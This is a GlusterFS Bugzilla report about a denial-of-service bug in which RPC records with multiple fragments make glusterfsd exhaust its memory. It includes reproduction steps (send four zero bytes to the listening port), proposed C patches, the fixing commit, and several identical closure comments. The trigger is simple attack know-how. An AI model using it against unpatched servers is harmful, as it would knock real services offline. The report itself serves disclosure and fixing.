Bug 1139598 - The memories are exhausted quickly when handle the message which has multi fragments in a single record
Summary: The memories are exhausted quickly when handle the message which has multi fr...
Keywords:
Status: CLOSED CURRENTRELEASE
Alias: None
Product: GlusterFS
Classification: Community
Component: rpc
Version: mainline
Hardware: All
OS: Linux
unspecified
low
Target Milestone: ---
Assignee: Gu Feng
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks: 1136221 1146200 1146466 1146470 1152900
TreeView+ depends on / blocked
 
Reported: 2014-09-09 09:50 UTC by Gu Feng
Modified: 2015-05-14 17:43 UTC (History)
4 users (show)

Fixed In Version: glusterfs-3.7.0
Doc Type: Bug Fix
Doc Text:
Clone Of: 1136221
: 1146470 (view as bug list)
Environment:
Last Closed: 2015-05-14 17:27:34 UTC
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Embargoed:


Attachments (Terms of Use)

Description Gu Feng 2014-09-09 09:50:54 UTC
+++ This bug was initially created as a clone of Bug #1136221 +++

Description of problem:
    We construct some rpc messages and send it to the IP and port which glusterfsd listens, the memory usage goes up quickly until exhausted

Version-Release number of selected component (if applicable):
    3.3.0, 3.4.1, 3.5.0


Steps to Reproduce:
1. Start glusterfs services, and get the IP and port that one glusterfsd process listens

2. Run the attachement python script, which connects the IP and port and send four bytes 00 00 00 00 to the glusterfsd process

3. Watch the memory usage of the glusterfsd process. It will grow up quickly

Actual results:
   Memory of the glusterfsd process grows up quickly till exhausted

Expected results:
   Glusterfsd just ignores the messages


Additional info:
   The bug seems in __socket_proto_state_machine, which goes into an infinite loop to malloc memories when handle the special message. The special message is "multi fragments in a single record", and some values are not reset when handle next fragment.
  
   We tested below fix and it seems work:
          if (!RPC_LASTFRAG (in->fraghdr)) {
 
+             in->pending_vector = in->vector;
+             in->pending_vector->iov_base =  &in->fraghdr;
+             in->pending_vector->iov_len  = sizeof (in->fraghdr);
              in->record_state = SP_STATE_READING_FRAGHDR;
              break;
           }

--- Additional comment from jiangkai on 2014-09-04 06:35:44 EDT ---

More issues than imaging to handle the "multi fragments in a single record" message. The proposal is to refuse it:


 if (!RPC_LASTFRAG (in->fraghdr)) {
       gf_log (this->name, GF_LOG_ERROR, "multiple fragments per record not supported now");
       ret = -1;
       goto out;
 }

--- Additional comment from jiangkai on 2014-09-05 04:45:08 EDT ---

It happens after 3.4;  
3.3.1 reports error messages.

It seems imported by the change id Icd9f256bb2fd8c6266a7abefdff16936b4f8922d to support SSL

--- Additional comment from Anand Avati on 2014-09-09 04:30:12 EDT ---

REVIEW: http://review.gluster.org/8662 (socket: Fixed parsing RPC records containing multi fragments) posted (#1) for review on master by Gu Feng (flygoast)

Comment 1 Anand Avati 2014-09-09 10:03:17 UTC
REVIEW: http://review.gluster.org/8662 (socket: Fixed parsing RPC records containing multi fragments) posted (#2) for review on master by Gu Feng (flygoast)

Comment 2 Anand Avati 2014-09-13 16:27:24 UTC
REVIEW: http://review.gluster.org/8662 (socket: Fixed parsing RPC records containing multi fragments) posted (#3) for review on master by Gu Feng (flygoast)

Comment 3 Anand Avati 2014-09-19 12:37:09 UTC
COMMIT: http://review.gluster.org/8662 committed in master by Raghavendra G (rgowdapp) 
------
commit fb6702b7f8ba19333b7ba4af543d908e3f5e1923
Author: Gu Feng <flygoast>
Date:   Tue Sep 9 18:00:22 2014 +0800

    socket: Fixed parsing RPC records containing multi fragments
    
    In __socket_proto_state_machine(), when parsing RPC records containing
    multi fragments, just change the state of parsing process, had not
    processed the memory to coalesce the multi fragments.
    
    Change-Id: I5583e578603bd7290814a5d26885b31759c73115
    BUG: 1139598
    Signed-off-by: Gu Feng <flygoast>
    Reviewed-on: http://review.gluster.org/8662
    Tested-by: Gluster Build System <jenkins.com>
    Reviewed-by: Niels de Vos <ndevos>
    Reviewed-by: Raghavendra G <rgowdapp>
    Tested-by: Raghavendra G <rgowdapp>

Comment 4 Niels de Vos 2015-05-14 17:27:34 UTC
This bug is getting closed because a release has been made available that should address the reported issue. In case the problem is still not fixed with glusterfs-3.7.0, please open a new bug report.

glusterfs-3.7.0 has been announced on the Gluster mailinglists [1], packages for several distributions should become available in the near future. Keep an eye on the Gluster Users mailinglist [2] and the update infrastructure for your distribution.

[1] http://thread.gmane.org/gmane.comp.file-systems.gluster.devel/10939
[2] http://thread.gmane.org/gmane.comp.file-systems.gluster.user

Comment 5 Niels de Vos 2015-05-14 17:35:35 UTC
This bug is getting closed because a release has been made available that should address the reported issue. In case the problem is still not fixed with glusterfs-3.7.0, please open a new bug report.

glusterfs-3.7.0 has been announced on the Gluster mailinglists [1], packages for several distributions should become available in the near future. Keep an eye on the Gluster Users mailinglist [2] and the update infrastructure for your distribution.

[1] http://thread.gmane.org/gmane.comp.file-systems.gluster.devel/10939
[2] http://thread.gmane.org/gmane.comp.file-systems.gluster.user

Comment 6 Niels de Vos 2015-05-14 17:37:57 UTC
This bug is getting closed because a release has been made available that should address the reported issue. In case the problem is still not fixed with glusterfs-3.7.0, please open a new bug report.

glusterfs-3.7.0 has been announced on the Gluster mailinglists [1], packages for several distributions should become available in the near future. Keep an eye on the Gluster Users mailinglist [2] and the update infrastructure for your distribution.

[1] http://thread.gmane.org/gmane.comp.file-systems.gluster.devel/10939
[2] http://thread.gmane.org/gmane.comp.file-systems.gluster.user

Comment 7 Niels de Vos 2015-05-14 17:43:42 UTC
This bug is getting closed because a release has been made available that should address the reported issue. In case the problem is still not fixed with glusterfs-3.7.0, please open a new bug report.

glusterfs-3.7.0 has been announced on the Gluster mailinglists [1], packages for several distributions should become available in the near future. Keep an eye on the Gluster Users mailinglist [2] and the update infrastructure for your distribution.

[1] http://thread.gmane.org/gmane.comp.file-systems.gluster.devel/10939
[2] http://thread.gmane.org/gmane.comp.file-systems.gluster.user


Note You need to log in before you can comment on or make changes to this bug.